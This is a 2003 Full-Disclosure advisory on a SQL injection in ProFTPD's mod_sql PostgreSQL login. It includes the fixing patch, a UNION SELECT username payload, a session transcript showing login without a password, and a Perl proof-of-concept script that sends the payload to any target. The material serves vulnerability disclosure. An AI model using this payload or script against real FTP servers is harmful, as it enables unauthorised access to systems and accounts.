[Full-Disclosure] SQL Inject in ProFTPD login against Postgresql using mod_sql From: "runlevel " <runlevel@linuxmail.org> To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com Date: Yesterday 22.48.40 =============================================== SQL Inject in ProFTPD login against Postgresql using mod_sql =============================================== Author: runlevel [runlevel@raregazz.org] Date: 20/Jan/2003 Release: 18/Jun/2003 Barcelona, Spain 2003 Systems Affected ================ All ProFTPD prior to ProFTPD 1.2.9rc1 against PostgreSQL using mod_sql and ProFTPD 1.2.9rc1 using a version lower than PostgreSQL 7.2. Overview ======== A SQL Inject exists in ProFTPD server using the mod_sql module to authenticate against PostgreSQL database server. This vulnerability may allow a remote user to login whithout user and password. Description =========== Mod_sql is an authentication module for ProFTPD. The backend module mod_sql_postgres is used to authenticate users doing a query to postgresql server to retrieve user and password. Mod_sql_postgres don't implements any function to escape strings and it may allow to inject sql code in user login. The solution of module programmer is the comment in the source code: /* PostgreSQL has no way to escape strings internally */ In proftpd 1.2.9rc1 remove POSTGRES_NO_ESCAPESTRING #define, and always expect PQescapestring() to be present. With this patch, mod_sql_postgres will always fail unless the Postgres library is new enough. -------------------------------------------------------------------- Index: contrib/mod_sql_postgres.c =================================================================== RCS file: /cvsroot/proftp/proftpd/contrib/mod_sql_postgres.c,v retrieving revision 1.15 diff -u -r1.15 mod_sql_postgres.c --- contrib/mod_sql_postgres.c 29 May 2003 07:29:43 -0000 1.15 +++ contrib/mod_sql_postgres.c 17 Jun 2003 20:52:30 -0000 @@ -1105,23 +1105,13 @@ conn = (db_conn_t *) entry->data; /* Note: the PQescapeString() function appeared in the C API as of - * Postgres-7.2; this macro allows for functioning with older postgres - * installations. Unfortunately, Postgres' PG_VERSION is defined as - * a string, not an actual number, which makes for preprocessor-time checking - * of that value much harder. - * - * Ideally, this function could be detected by a configure script, but - * ProFTPD does not yet support per-module configure scripts. + * Postgres-7.2. */ -#ifndef POSTGRES_NO_PQESCAPESTRING unescaped = cmd->argv[1]; escaped = (char *) pcalloc(cmd->tmp_pool, sizeof(char) * (strlen(unescaped) * 2) + 1); PQescapeString(escaped, unescaped, strlen(unescaped)); -#else - escaped = cmd->argv[1]; -#endif sql_log(DEBUG_FUNC, "%s", "exiting \tpostgres cmd_escapestring"); return mod_create_data(cmd, (void *) escaped); -------------------------------------------------------------------- Impact ====== Any attacker who can reach a vulnerable server can login whithout user and password. Moreover, the attacker can change his login id, gid and path. Proof Of Concept ================ A proof of concept is shown to demostrate de sql injection. The versions used are: mod_sql v.4.0, postgresql 7.2.1-2 and proftpd 1.2.8. runlevel@runlevel:~/$ ftp localhost Connected to localhost. 220 ProFTPD 1.2.8 Server (Debian) [*****] Name (localhost:runlevel): ')UNION SELECT 'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''=' 331 Password required for ')UNION. Password: 230 User ')UNION SELECT 'u','p',1001,1001,'/tmp' ,'/bin/bash' WHERE(''=' logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> We can view the final sql query in syslog: Jun 9 01:40:54 runlevel proftpd[10978]: ****** (127.0.0.1[127.0.0.1]) - mod_sql_postgres/4.01: query "SELECT userid, passwd, uid, gid, shell FROM prue WHERE (userid='')UNION SELECT 'u','p',1002,1002, '/bin/bash' WHERE(''='') LIMIT 1" Perl script to automatize the process: #!/usr/bin/perl # Sql inject on ProFTPD with mod_sql proof of concept script # runlevel [ runlevel@raregazz.org ] # Spain, 2003 use IO::Socket; if(@ARGC<2){ print "\nProof Of Concept Sql Inject on ProFTPD\n"; print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n"; exit(0); }; $server = $ARGV[0]; $query = $ARGV[1]; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) or die "Can't connect. \n"; if(defined($line=<$remote>)){ print STDOUT $line; } # Proof of concept query, it may change on the number of rows # By default, it can query User, Pass, Uid, Gid, Shell or # User, Pass, Uid, Gid, Shell, Path, change the union query... if($query eq "1"){ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n"; }else{ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n"; }; if(defined($line=<$remote>)){ print STDOUT $line; } print $remote "PASS p\n"; if(defined($line=<$remote>)){ print STDOUT $line; } print "Sent query to $ARGV[0]\n"; if($line =~ /230/){ #logged in print "[------- Sql Inject Able \n"; }else{ print "[------- Sql Inject Unable \n"; } close $remote; ----------------------------------------------------------------- -=RareGaZz=- 1996-2003, Derechos Reservados (c) RST - http://www.raregazz.org ----------------------------------------------------------------- -- ______________________________________________ http://www.linuxmail.org/ Now with e-mail forwarding for only US$5.95/yr Powered by Outblaze _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
glsa sent